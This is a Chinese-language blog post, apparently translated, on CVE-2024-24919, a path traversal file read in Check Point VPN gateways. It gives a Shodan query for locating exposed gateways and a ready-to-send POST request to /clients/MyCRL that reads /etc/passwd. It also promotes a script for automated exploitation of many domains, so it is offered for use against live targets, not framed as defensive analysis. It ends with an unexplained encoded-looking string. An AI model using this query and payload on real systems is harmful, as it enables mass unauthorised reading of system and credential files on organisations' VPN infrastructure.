CVE-2024-24919:Check Point VPN网关任意文件读取漏洞分析与自动化利用

30 阅读2分钟

CVE-2024–24919:Check Point VPN网关中的任意文件读取漏洞

#$ubh@nk@r 2分钟阅读 · 2024年6月7日

引言

大家好,黑客朋友们!👋 在今天的文章中,我将讨论一个名为CVE-2024-24919的最新漏洞。我们将探讨如何识别该漏洞以及如何利用它。该漏洞在Check Point的CloudGuard网络安全设备中被发现。我还会向大家介绍一个工具,可以轻松地自动化利用此漏洞,覆盖大规模目标。那么,让我们开始吧。

Shodan搜索语法

任何人都可以使用以下Shodan搜索语法来查找存在此CVE的目标。语法如下:

Server:"Check Point SVN Foundation""org"

利用CVE-2024–24919

该漏洞可以通过向/clients/MyCRL端点发送特制的POST请求来利用。以下是漏洞利用的基本思路:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/passwd

如果目标域名存在漏洞,它将显示/etc/passwd文件的内容。

自动化利用CVE-2024–24919

最后,我编写了一个Bash脚本来自动化此漏洞利用过程。

GitHub - starlox0/CVE-2024-24919-POC: 一个用于自动化CVE-2024-24919的简单漏洞利用代码(POC)

我主要利用了Curl命令行工具的单行命令。 我将其集成到了我的脚本中。您可以用它来测试单个域名或多个域名。

针对多个域名的测试

多么简单!😄

今天就到这里。希望您能学到新东西。请继续关注我的下一篇文章。

感谢阅读!😄

如果您喜欢,别忘了点赞和关注我以获取更多文章。

祝您黑客愉快~ CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLNkfLFNQQTShIX6r8NWdTB6q2Q58n9qUz/4bOKG29WEpTrhaqSQOmZhCdmEm86OFQmJXE1k7fcUhBHzLwh58Ey25A7g89h4prYzdSx2bHjow==